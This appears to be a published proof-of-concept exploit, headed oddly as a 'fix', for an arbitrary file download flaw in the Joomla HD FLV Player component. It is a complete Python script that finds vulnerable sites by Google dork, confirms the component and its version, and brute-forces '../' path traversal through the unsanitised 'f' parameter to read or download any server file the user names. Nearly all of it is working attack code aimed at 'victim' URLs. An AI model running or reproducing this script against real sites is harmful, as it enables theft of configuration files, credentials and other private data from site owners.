Joomla Components HD Flv Player Fix on Windows

1. #!/usr/bin/env python
2. #
3. # Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
4. #
5. # Exploit Author : Claudio Viviani
6. #
7. # Vendor Homepage : http://www.hdflvplayer.net/
8. #
9. # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
10. #
11. # Dork google 1: inurl:/component/hdflvplayer/
12. # Dork google 2: inurl:com_hdflvplayer
13. #
14. # Date : 2014-11-11
15. #
16. # Tested on : BackBox 3.x/4.x
17. #
18. # Info:
19. # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
20. # The variable "f" is not sanitized.
21. # Over 80.000 downloads (statistic reported on official site)
22. #
23. #
24. # Video Demo: http://youtu.be/QvBTKFLBQ20
25. #
26. #
27. # Http connection
28. import urllib, urllib2
29. # String manipulation
30. import re
31. # Time management
32. import time
33. # Args management
34. import optparse
35. # Error management
36. import sys
37.  
38. banner = """
39. _______ __ ___ ___ ______
40. | _ .-----.-----.--------| .---.-. | Y | _ \\
41. |___| | _ | _ | | | _ | |. 1 |. | \\
42. |. | |_____|_____|__|__|__|__|___._| |. _ |. | \\
43. |: 1 | |: | |: 1 /
44. |::.. . | |::.|:. |::.. . /
45. `-------' `--- ---`------'
46. _______ ___ ___ ___ _______ __
47. | _ | | | Y | | _ | .---.-.--.--.-----.----.
48. |. 1___|. | |. | | |. 1 | | _ | | | -__| _|
49. |. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
50. |: | |: 1 |: 1 | |: | |_____|
51. |::.| |::.. . |\:.. ./ |::.|
52. `---' `-------' `---' `---'
53.  
54. <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d
55.  
56. Written by:
57.  
58. Claudio Viviani
59.  
60. http://www.homelab.it
61.  
62. info@homelab.it
63. homelabit@protonmail.ch
64.  
65. https://www.facebook.com/homelabit
66. https://twitter.com/homelabit
67. https://plus.google.com/+HomelabIt1/
68. https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
69. """
70.  
71. # Check url
72. def checkurl(url):
73. if url[:8] != "https://" and url[:7] != "http://":
74. print('[X] You must insert http:// or https:// procotol')
75. sys.exit(1)
76. else:
77. return url
78.  
79.  
80. def checkcomponent(url,headers):
81.  
82. try:
83. req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
84. sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
85. print("")
86. except urllib2.HTTPError:
87. sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
88. sys.exit(1)
89. except urllib2.URLError:
90. print '[X] Connection Error'
91.  
92. def checkversion(url,headers):
93.  
94. try:
95. req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
96. response = urllib2.urlopen(req).readlines()
97.  
98. for line_version in response:
99.  
100. if not line_version.find("<version>") == -1:
101.  
102. VER = re.compile('>(.*?)<').search(line_version).group(1)
103.  
104. sys.stdout.write("\r[+] Checking Version: "+str(VER))
105. print("")
106.  
107. except urllib2.HTTPError:
108. sys.stdout.write("\r[+] Checking Version: Unknown")
109.  
110. except urllib2.URLError:
111. print("\n[X] Connection Error")
112. sys.exit(1)
113.  
114. def connection(url,headers,pathtrav):
115.  
116. char = "../"
117. bar = "#"
118. s = ""
119. barcount = ""
120.  
121. for a in range(1,20):
122.  
123. s += char
124. barcount += bar
125. sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
126. sys.stdout.flush()
127.  
128. try:
129. req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
130. response = urllib2.urlopen(req)
131.  
132. content = response.read()
133.  
134. if content != "" and not "failed to open stream" in content:
135. print("\n[!] VULNERABLE")
136. print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
137. print("")
138. print("[+] Do you want [D]ownload or [R]ead the file?")
139. print("[+]")
140. sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
141.  
142. download = set(['d'])
143. read = set(['r'])
144.  
145. while True:
146. choice = raw_input().lower()
147. if choice in download:
148. filedown = pathtrav.split('/')[-1]
149. urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
150. print("[!] DOWNLOADED!")
151. print("[!] Check file: "+filedown)
152. return True
153. elif choice in read:
154. print("")
155. print content
156. return True
157. else:
158. sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
159.  
160. except urllib2.HTTPError:
161. #print '[X] HTTP Error'
162. pass
163. except urllib2.URLError:
164. print '\n[X] Connection Error'
165.  
166. time.sleep(1)
167. print("\n[X] File not found or fixed component :(")
168.  
169. commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
170. commandList.add_option('-t', '--target', action="store",
171. help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
172. )
173. commandList.add_option('-f', '--file', action="store",
174. help="Insert file to check",
175. )
176. options, remainder = commandList.parse_args()
177.  
178. # Check args
179. if not options.target or not options.file:
180. print(banner)
181. commandList.print_help()
182. sys.exit(1)
183.  
184. print(banner)
185.  
186. url = checkurl(options.target)
187. pathtrav = options.file
188.  
189. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
190.  
191. sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
192. checkcomponent(url,headers)
193. sys.stdout.write("\r[+] Checking Version: ")
194. checkversion(url,headers)
195. sys.stdout.write("\r[+] Exploiting...please wait:")
196. connection(url,headers,pathtrav)